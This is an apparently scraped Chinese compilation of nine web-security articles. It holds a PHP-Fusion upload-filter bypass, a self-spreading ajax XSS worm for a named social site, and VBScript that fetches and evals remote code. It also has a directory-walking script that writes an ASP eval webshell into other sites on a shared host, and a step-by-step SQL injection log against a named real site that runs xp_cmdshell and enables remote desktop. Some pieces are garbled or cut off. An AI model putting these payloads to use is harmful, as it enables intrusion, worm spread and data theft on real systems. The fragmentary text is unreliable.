phpfusion的一个Xday分析脚本安全

phpfusion的一个Xday分析脚本安全（共9篇）由网友“兰恩”投稿提供，下面小编为大家整理后的phpfusion的一个Xday分析脚本安全，希望能帮助大家!

篇1：phpfusion的一个Xday分析脚本安全

by Superhei@ph4nt0m

-04-15

www.ph4nt0m.org

includes/update_profile_include.php

...

$newavatar = $_FILES['user_avatar'];

if ($userdata['user_avatar'] == “” && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) {

if (preg_match(“/^[-0-9A-Z_.[]]+$/i”, $newavatar['name']) && $newavatar['size'] <= 30720) {

$avatarext = strrchr($newavatar['name'],“.”);

if (eregi(“.gif”, $avatarext) || eregi(“.jpg”, $avatarext) || eregi(“.png”, $avatarext)) {

$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], “.”));

$avatarname = $avatarname.“[”.$userdata['user_id'].“]”.$avatarext;

$set_avatar = “user_avatar='$avatarname', ”;

move_uploaded_file($newavatar['tmp_name'], IMAGES.“avatars/”.$avatarname);

chmod(IMAGES.“avatars/”.$avatarname,0644);

if ($size = @getimagesize(IMAGES.“avatars/”.$avatarname)) {

if ($size['0'] > 100 || $size['1'] > 100) {

unlink(IMAGES.“avatars/”.$avatarname);

$set_avatar = “”;

}

} else {

unlink(IMAGES.“avatars/”.$avatarname);

$set_avatar = “”;

判断的伪代码：

$newavatar['name']= $_GET[a]; //提交 a=1.php.php.gifa

print preg_match(“/^[-0-9A-Z_.[]]+$/i”, $newavatar['name']); //名字里可以有.

$avatarext = strrchr($newavatar['name'],“.”);//取后缀

print eregi(“.gif”, $avatarext); //只要后缀里包含有.gif就ok了 那么我们可以提交1.php.php.gif

$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], “.”));取最文件名的前面的部分

$avatarname = $avatarname.“[”.$userdata['user_id'].“]”.$avatarext;

$set_avatar = “user_avatar='$avatarname', ”;

print $avatarname; //1.php.php.gifa==>1.php.php[id号].gifa

//move_uploaded_file($newavatar['tmp_name'], IMAGES.“avatars/”.$avatarname);

在apache下是可以利用了[1]，那么下面的getimagesize的判断：

if ($size = @getimagesize(IMAGES.“avatars/”.$avatarname)) {

if ($size['0'] > 100 || $size['1'] > 100) {

//可以利用关于paas getimagesize()的帖子构造图片 [2]

当时我是在官方下的v6.00.305测试的，不过无意中在milw0rm上已经有人发过了[3]，

phpfusion的一个Xday分析脚本安全

。 :(

于是又到官方逛，在一个角落里发现了新点的版本：v6.01.10的Code：

........

if ($userdata['user_avatar'] == “” && !empty($newavatar['name']) && is_uploaded_file($newavatar['tmp_name'])) {

$avatarext = strrchr($newavatar['name'],“.”);

$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], “.”));

if (preg_match(“/^[-0-9A-Z_[]]+$/i”, $avatarname) && preg_match(“/(.gif|.GIF|.jpg|.JPG|.png|.PNG)$/”, $avatarext) && $newavatar['size'] <= 30720) {

$avatarname = $avatarname.“[”.$userdata['user_id'].“]”.$avatarext;

$set_avatar = “user_avatar='$avatarname', ”;

move_uploaded_file($newavatar['tmp_name'], IMAGES.“avatars/”.$avatarname);

chmod(IMAGES.“avatars/”.$avatarname,0644);

if ($size = @getimagesize(IMAGES.“avatars/”.$avatarname)) {

if ($size['0'] > 100 || $size['1'] > 100) {

unlink(IMAGES.“avatars/”.$avatarname);

........

判断的伪代码：

$newavatar['name']= $_GET[a];

$avatarext = strrchr($newavatar['name'],“.”);

$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], “.”));

print $avatarext.“

”;

print $avatarname.“

”;

print preg_match(“/^[-0-9A-Z_[]]+$/i”, $avatarname).“

”; //提取后缀的部分不可以有. [不可以提交1.php.gif这样的类型]

print preg_match(“/(.gif|.GIF|.jpg|.JPG|.png|.PNG)$/”, $avatarext).“

”;

没戏了~~~

一些sy的思考:

如果preg_match(“/^[-0-9A-Z_[]]+$/i”, $avatarname)没有过滤.的话 是不是还有机会呢?

$newavatar['name']= $_GET[a];

$avatarext = strrchr($newavatar['name'],“.”);

$avatarname = substr($newavatar['name'], 0, strrpos($newavatar['name'], “.”));

print $avatarext.“

”;

print $avatarname.“

”;

print preg_match(“”/^[-0-9A-Z_.[]]+$/i“”, $avatarname).“

”; //我们使用v6.00.305的正则.

print preg_match(“/(.gif|.GIF|.jpg|.JPG|.png|.PNG)$/”, $avatarext).“

”;

我们提交?a=1.php.php.gifa时

preg_match(“”/^[-0-9A-Z_.[]]+$/i“”, $avatarname) ===>1

preg_match(“/(.gif|.GIF|.jpg|.JPG|.png|.PNG)$/”, $avatarext) ===>0

失败了,不过如果你看过se大牛的blog [4] ,preg_match(“/(.gif|.GIF|.jpg|.JPG|.png|.PNG)$/”, $avatarext)这个还是可以过的:

提交?a=1.php.php.gif%0a就可以绕过了,但是在

move_uploaded_file($newavatar['tmp_name'], IMAGES.“avatars/”.$avatarname);

win下是文件名1.php.php.gifx0a 是不合法的,但是在*nix下是可以的 :).

参考:

[1]<系统特性与web安全>:www.4ngel.net/article/63.htm

[2]:my.opera.com/pstgroup/blog/tips-bypass-getimagesize

[3]www.milw0rm.com/exploits/1760

[4]blog.php-security.org/archives/76-Holes-in-most-preg_match-filters.html

篇2：若干flash xss漏洞分析脚本安全

漏洞一：

Parameters.getInstance().data = loaderInfo.parameters;

public function get onPlayStart():String{

return (_data[“onPlayStart”]);

}

ExternalInterface.call(Parameters.getInstance().onPlayStart, _arg1);

ExternalInterface.call(Parameters.getInstance().onPlayStop);

ExternalInterface.call(Parameters.getInstance().onFileLoadedError);

漏洞二：

function reload(u, show_loading) {

if (show_loading == undefined) {

show_loading = true;

}

if (show_loading) {

_root.loading = new Loading(“Loading data...”);

}

var _local2 = “”;

if (_root.data != undefined) {

_local2 = _root.data;

}

if (u != undefined) {

if (u.length > 0) {

_local2 = u;

}

}

_root.lv = undefined;

_root.lv = new LoadVars();

_root.lv.onLoad = LoadVarsOnLoad;

_root.lv.make_chart = make_chart;

_root.lv.make_pie = make_pie;

_root.lv.load(_local2);

}

漏洞三：

var csPreloader;

loader.loadClip(csPreloader, preloader_mc.target);

漏洞四：

this.loadXML(file);

function init(file, ploader, bookmark, contentpath)

container.init(csConfigFile, preloader_mc, csFilesetBookmark, contentpath);

var csConfigFile;

漏洞五：

getURL(_loc2, this.playList.currentClip().getLinkWindow());

var _loc2 = this.playList.currentClip().getLinkURL();

_loc1.getLinkURL = function ()

{

return (this.linkUrl);

}; www.2cto.com

var _loc1 = (_global.org.flowplayer.playlist.Clip = function (name, baseUrl, fileName, start, end, protected, enableControl, linkUrl, linkWindow, type, allowResize, overlayFileName, overlayId, live, showOnLoadBegin, maxPlayCount, info, thumbnailUrl, suggestedClipsInfoUrl, id, keywords)

{

this.linkUrl = linkUrl;

｝

漏洞六：

this.textField.htmlText = ['

', content, '

'].join('');

_global.sIFR = function (textField, content)

{ ……

this.write(content);

……

}

sIFR.instance = new sIFR(_loc3.txtF, _loc4);

_loc4 = sIFR.VERSION_WARNING.split(“%s”).join(_root.version);

漏洞七：

this._setVar(“_onClick”, [_root.onclick, pConfig.onclick], “String”);

getURL(this._onClick, this._onClickTarget);

顺手写了个简单的检测已知漏洞的flash xss检测脚本：

​

篇3：天际网ajax worm分析及实现脚本安全

--> By:Neeao [B.C.T] -12-27

注：文章发布前已经通知了官方，

最近心血来潮想研究下ajax worm的传播，偶然发现了天际网的几处xss漏洞，其中一处为俱乐部处留言的地方没过滤好导致xss攻击。就写个ajax worm来玩玩了。

分析：

由于没有对script标记做很好的限制，使ajax worm的应用起来相对就容易的多了。

字符限制为1000，可以直接写源码进页面了。

刚开始用xmlhttp来获取数据和提交数据，不知道怎么回事，在IE下调试能用，在firefox下调试不起作用了。

后来发现天际网采用了一个叫做jquery的轻量级的javascript框架，于是直接调用框架中的ajax函数。

发现一个好处，采用系统自带框架的ajax函数，可以使ajax worm代码更短。

写了个简单的应用，一共10行，代码如下：

var indexhtml = $.ajax({url: “/Group/Index”,async:false}).responseText;

var urllist = indexhtml.substring(indexhtml.indexOf(“

”)+12,indexhtml.indexOf(“

”)).match(/groupId=d+/g);

if (urllist!=null){

for(i=0;i

var html = $.ajax({url: “/Group/GroupIndex?”+urllist[i],async: false}).responseText;

if(html.indexOf(“localhost/2.js”)==-1) {

$.ajax({type: “POST”,url: “/Group/BBSDone?”+urllist[i],data:“content=元旦快乐！&inIndex=true&”+urllist[i]});

}

}

}

源码分析如下：

//获取俱乐部主页源码

var indexhtml = $.ajax({url: “/Group/Index”,async:false}).responseText;

//获取要感染的俱乐部IDlist

var urllist = indexhtml.substring(indexhtml.indexOf(“

”)+12,indexhtml.indexOf(“

”)).match(/groupId=d+/g);

//如果当前用户加入的有俱乐部，则感染，没有则退出执行

if (urllist!=null){

//循环感染

for(i=0;i

//获取要感染俱乐部页面源码

var html = $.ajax({url: “/Group/GroupIndex?”+urllist[i],async: false}).responseText;

//判断是否已经感染，没感染则感染

if(html.indexOf(“localhost/2.js”)==-1) {

//感染

$.ajax({type: “POST”,url: “/Group/BBSDone?”+urllist[i],data:“content=元旦快乐！&inIndex=true&”+urllist[i]});

}

}

}

一个获取ajax worm蠕虫本身源码的函数，使用当前页面自己感染的时候或许有用，

function codes{

var urlstr = document.location.href;

var code = $.ajax({url: urlstr,async: false}).responseText;

code = code.substring(code.indexOf(“”),code.lastIndexOf(“”));

return code;

}

篇4：一个有趣的Ajax Hack示范脚本安全

今天在梦之光芒的BLOG上看见了一个Ajax Hack示范，其实跨站发现很容易，但是要做到大危害还是很难，偷偷COOKIE什么的只针对用户而已，XSS WORM的那种利用才是可怕的，

来看看他的一段VBSCRIPT脚本

vbscript.:execute(“

dim l,s:

l=chr(13)+chr(10):

s=”“sub mycode”“&l:

s=s&”“dim http,url,pg,p,p2,cd,ht,o”“&l:

s=s&”“url=”“”“hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html”“”“”“&l:

s=s&”“set http=createobject(”“”“Microsoft.XMLHTTP”“”“)”“&l:

s=s&”“http.open ”“”“get”“”“,url,false”“&l:

s=s&”“http.send(”“”“”“”“)”“&l:

s=s&”“pg=http.responseText”“&l:

s=s&”“p=instr(1,pg,”“”“ILOVEUNING-BEGIN”“”“)”“&l:

s=s&”“if p=null or p<1 then exit sub”“&l:

s=s&”“p=instr(p,pg,chr(37))”“&l:

s=s&”“if p=null or p<1 then exit sub”“&l:

s=s&”“p2=instr(p,pg,chr(60))”“&l:

s=s&”“cd=mid(pg,p,p2-p)”“&l:

s=s&”“ht=”“”“eval(unescape('”“”“&cd&”“”“'))”“”“”“&l:

s=s&”“window.execScript. ht,”“”“jscript”“”“”“&l:

s=s&”“end sub”“&l:

execute(s):

document.body.onload=getref(”“mycode”“):

”)

调用代码在 hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html

这样就实现了本站调用代码，换个思路，是否这就解决了Ajax Hack常用的的提交数据限制（站外提交没有权限,XSS代码长度限制)的问题，呵呵~这里我也没实验，

再还有一个思路就是剑心的分片写入脚本再eval出来~这两个思路结合起来，也许我们就能在苛刻的XSS漏洞上创造奇迹！

篇5：一个找二层目录的小东东脚本安全

碰到个虚拟主机,iis7.0.里边有上万个站,只有脚本权限,没命令行权限,但是可以跨目录写文件.如果能得到目标站的物理目录,能立马搞定.但是想尽一切办法,也没找到物理路径.所以只有用脚本找了.手工找会累死的.一个php是找的,一个asp是写的.

set_time_limit(0);

$path = 'D:/Hosting';

$somefile = $_GET['key'];

$logfile = 'D:/Hosting/6668835/html/images/ennumdir.txt';

if (!isset($_SERVER['PHP_AUTH_USER'])) {

header('WWW-Authenticate: Basic realm=“My Realm”');

header('HTTP/1.0 401 Unauthorized');

echo 'Text to send if user hits Cancel button';

exit;

} else {

if(is_dir($path) && is_readable($path))

{

$path2 = '';

$handle = opendir($path);

while(false !== ($filename = readdir($handle)))

{

if($filename{0} != $_GET['dir'])

{

continue;

}

/*

if($filename{1} != $_GET['two'])

{

continue;

}

*/

//$path2 = $path.'/'.$filename.'/html';

$path2 = $path.'/'.$filename;

if(is_dir($path2) && is_readable($path2))

{

@$handle2 = opendir($path2);

while(false !== ($filename2 = readdir($handle2)))

{

if($filename2 == $somefile)

{

//echo'[+]Found !'.$filename2.“n”;

file_put_contents($logfile,'[+]Found !'.$path2.'/'.$filename2.“n”,FILE_APPEND);

}

}

@closedir($handle2);

}

}

file_put_contents($logfile,'[*]LAST '.$path2.“n”,FILE_APPEND);

closedir($handle);

}

}

<%

Server.ScriptTimeout=500000000

key = Trim(Request.QueryString(“key”))

msg=“ <% eval(rquese(Chr(35)))%” &“>”

Set FSO=Server.CreateObject(“Scripting.FileSystemObject”)

Set ServerFolder=FSO.GetFolder(“C:intel”)

Set ServerFolderList=ServerFolder.subfolders

For Each ServerFileEvery IN ServerFolderList

' Response.write  ServerFileEvery&“”

If LCase(Left(ServerFileEvery.name, 1)) = LCase(key) Then

Set sServerFolder=FSO.GetFolder(ServerFileEvery)

Set sServerFolderList=sServerFolder.subfolders

For Each sServerFileEvery IN sServerFolderList

If LCase(sServerFileEvery.name) = “images” Then

StreamSaveToFile sServerFileEvery & “google.asp”, msg, “UTF-8”

End If

Next

End If

Next

Function StreamSaveToFile(sPath, sContent, sCharSet)

Dim oStream

If(InStr(sPath, “:”) <= 0)Then

sPath = Replace(sPath, “,”, “，”)

sPath = Server.MapPath(sPath)

sPath = Replace(sPath, “，”, “,”)

End If

Set oStream = Server.CreateObject(“Adodb.Stream”)

With oStream

.Type = 2

.Mode = 3

.Open

.Charset = sCharSet

.WriteText sContent

.SaveToFile sPath, 2

.Close

End With

Set oStream = Nothing

End Function

%>

篇6：一个防止外部数据提交的脚本WEB安全

提交时可能会有人修改script从本地提交，这样存在安全提交的问题，所以应该要求从服务器断路径提交，其他地址提交提交无无效：

<%

server_v1=Cstr(Request.ServerVariables(“HTTP_REFERER”))

server_v2=Cstr(Request.ServerVariables(“SERVER_NAME”))

if mid(server_v1,8,len(server_v2))server_v2 then

response.write “

”

response.write “”

response.write “你提交的路径有误，禁止从站点外部提交数据请不要乱该参数！”

response.write “”

response.end

end if

篇7：多多医院科室网站管理系统漏洞分析脚本安全

闲着无聊也学学牛淫来找找漏洞分析代码，。于是就找了。

先来看看大致看了下代码。就分析下这个文件好了

Shownews.asp

。。。。。

sub shownews(l)

dim newsid

newsid=request(“newsid”)

if newsid=“” or not isnumeric(newsid) then

response.redirect“news.asp

。。。。。。

在top.asp文件里面调用了过滤注入的文件

就是这个文件，

具体内容我就不发了。。

接着分析Shownews.asp的代码。我们看。。if 判断newsid数为空 或者不为数字就返回林外页面news.asp...这样以来。。我就无法进行cookies注入了。。我测试了下。如果不是他返回。news.asp的话就可以进行cookies注入。当然。只是如果。毕竟这条路已经走不通。注入是完全没有希望了。。于是就继续分析看有没有xss漏洞。。虽然很多地方都过滤和的还是让我找到一个没有过滤的地方。如图1。然后我们跨站代码。。注意。 会一直循环

只弹出一次。然后我们预览。。如图3.over

篇8：双向跨站(Double Trap XSS)注入分析脚本安全

作者: Aditya K Sood

译者:riusksk(泉哥)

漏洞分析

本篇分析介绍了不同领域下的XSS注入攻击,这里没有使用XSS cheatsheat.现在让我们开始详细分析它，本次实例的目标是SecTheory安全咨询站点。这个过程使用了两种不同的方法，这将使一些安全公司受到微创，同时也有利于新的exploitation类型的确立。两者的结果是相同的，只是方式不一样。

们通过寻找安全漏洞并利用它来进行网站攻击。我个人总是习惯使用两种方法来踩点：

1.URL Banging:在URL中注入输入参数。

2.  Form. Splitting:在form表单中注入伪造的参数，

关键代码：

Your phone number:

Your email address:

。。。。。

注入以下代码

''

TELNET

篇9：hdsi2.0 sql注入部分抓包分析语句脚本安全

恢复cmd

;insert tb1 exec master..xp_cmdshell'net user '--

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--

执行命令：

sql: ;ipconfig -all--

dos：

;Drop table comd_list ;CREATE TABLE comd_list (ComResult nvarchar(1000)) INSERT comd_list EXEC MASTER..xp_cmdshell

”ipconfig

-all“--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [comd_list] Where 1=1)>0

列目录：

c: jiaozhu 临时表

;drop table jiaozhu;CREATE TABLE jiaozhu(DirName VARCHAR(100), DirAtt VARCHAR(100),DirFile VARCHAR(100)) INSERT jiaozhu

EXEC

MASTER..XP_dirtree ”c:",1,1--

GET /plaza/event/new/crnt_event_view.asp?event_id=57

And (Select char(94)+Cast(Count(1) as varchar(8000))+char(94) From [jiaozhu] Where 1=1)>0

上传文件：

本地路径：C:Inetpubwwwrootcook.txt 保存位置：c：

数据库存储过程：

;exec master..xp_cmdshell ' echo

cdb_sid=3UrzOV;%20cdb_cookietime=2592000;%20cdb_auth=VgcCBAJbVQxVAVMCVghTBFJUUQYDBQdTV1BWVQoKAQE6PwNX;%

20cdb_visitedfid=12;%2

0cdb_oldtopics=D8D>c:'--

数据库备份：(上传后删除临时表)

;Drop table [xiaopan];create table [dbo].[xiaopan] ([cmd] [text])--

;insert into xiaopan(cmd) values(' echoStr ')--

;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='c:/' backup database @a to disk=@s WITH

DIFFERENTIAL,FORMAT--

;Drop table [xiaopan]--

开启3389：

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'softwaremicrosoftwindowscurrentversionnetcache','enable','reg_sz','0';-

---

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'softwaremicrosoftwindows

ntcurrentversionwinlogon','shutdownwithoutlogon','reg_sz','0';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'softwarepoliciesmicrosoftwindowsinstaller','enableadmintsremote','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite @r,'systemcurrentcontrolsetcontrol

terminal

servert','senabled','reg_dword',1;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'systemcurrentcontrolsetservicestermdd','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite

@r,'systemcurrentcontrolsetservicestermservice','start','reg_dword',2;----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_regwrite 'hkey_users','.defaultkeyboard

layouttoggle','hotkey','reg_sz','1';----

;declare @r varchar(255) set @r='hkey_local_machine'exec master..xp_cmdshell 'iisreset /reboot';----

注入分析：数字型 SQL错误提示关闭 开启 access

使用关键字 宝石公园“你玩 我抽”中奖名单公布

igame.sina.com.cn/plaza/event/new/crnt_event_view.asp?event_id=57

多句查询 支持

子查询 支持

权限 public

当前用户 dbo

当前库 event

;create table t_jiaozhu(jiaozhu varchar(200))

And 1=1

And 1=2

And (Select Count(1) from SYSObjects)>0

and (select len(user))<32

;declare @a int--

And (IS_SRVROLEMEMBER('sysadmin'))=1

And (IS_MEMBER('db_owner'))=1

and (select len(user))<16

and (select len(user))<4

and (select len(user))<2

and (select len(user))<3

and (select len(user))<3

and (select len(user))<4

and (select ascii(substring(user,1,1)))<80

and (select ascii(substring(user,2,1)))<80

and (select ascii(substring(user,3,1)))<80

and (select ascii(substring(user,1,1)))<104

and (select ascii(substring(user,2,1)))<104

and (select ascii(substring(user,3,1)))<104

and (select ascii(substring(user,1,1)))<92

and (select ascii(substring(user,2,1)))<92

and (select ascii(substring(user,3,1)))<116

and (select ascii(substring(user,1,1)))<98

...

...

...

and (select len(db_name()))<16

and (select len(db_name()))<8

and (select len(db_name()))<4

...

...

...

and (select ascii(substring(db_name(),1,1)))<80

and (select ascii(substring(db_name(),2,1)))<80

and (select ascii(substring(db_name(),5,1)))<85

跨库：

猜解数据库：

GET

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <8

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <4

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <6

and (Select top 1 len(name) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <7

...

...

...

and (Select top 1 ascii(substring(name,2,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

and (Select top 1 ascii(substring(name,3,1)) from (Select top 2 dbid,name from [master]..[sysdatabases] ) T order by

dbid

desc) <104

...

...

...

and (Select top 1 len(name) from (Select top 4 dbid,name from [master]..[sysdatabases] ) T order by dbid desc) <5

master 不是sa权限，不能跨库

猜解表名：

EventCategory

GET

and (Select top 1 unicode(substring(name,2,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

and (Select top 1 unicode(substring(name,11,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,12,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char

(85)) T

order by id desc) < 80

and (Select top 1 unicode(substring(name,6,1)) from(Select top 1 id,name from [EVENT]..sysobjects where xtype=char(85))

T

order by id desc) < 80

猜解列名：

GET

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<32

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<48

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<56

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<60

and (select count(1) from EVENT..syscolumns A,EVENT..sysobjects B where A.id=B.id and B.name='EventCategory')<62

and (select top 1 len(name) from ( select top 1 A.id,A.name from EVENT..syscolumns A,EVENT..sysobjects B where

A.id=B.id and

B.name='EventCategory' order by A.name desc) T order by name asc )<35

★ Linux操作系统中的防火墙技术及其应用

★ waf绕过:mysql注入waf绕过技巧脚本安全

★ 网数据库的代码集合

★ 对于跨不同服务器的sql脚本执行语言的摘要数据库教程

★ php 面试题

★ 唯品会php面试题

★ 英文即兴演讲自我介绍

★ 计算机系工作职责

★ 脚本范文

★ linux中./configure命令参数解析linux操作系统

《phpfusion的一个Xday分析脚本安全.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

【phpfusion的一个Xday分析脚本安全（共9篇）】相关文章：

教你用Linux完成Oracle自动物理备份2023-06-07

php笔试题附带详细答案2023-01-07

教你做服务级的木马后门2023-07-09

Discuz XSS得webshell脚本安全2022-05-08

PHP笔试题目及答案2023-09-04

几道PHP笔试题2022-07-22

上传漏洞终结篇讲解2022-10-05

闪存博客SQL注入脚本安全2023-09-01

爆破字典生成小脚本脚本安全2022-05-06

让脚本躲过杀毒软件脚本安全2023-08-31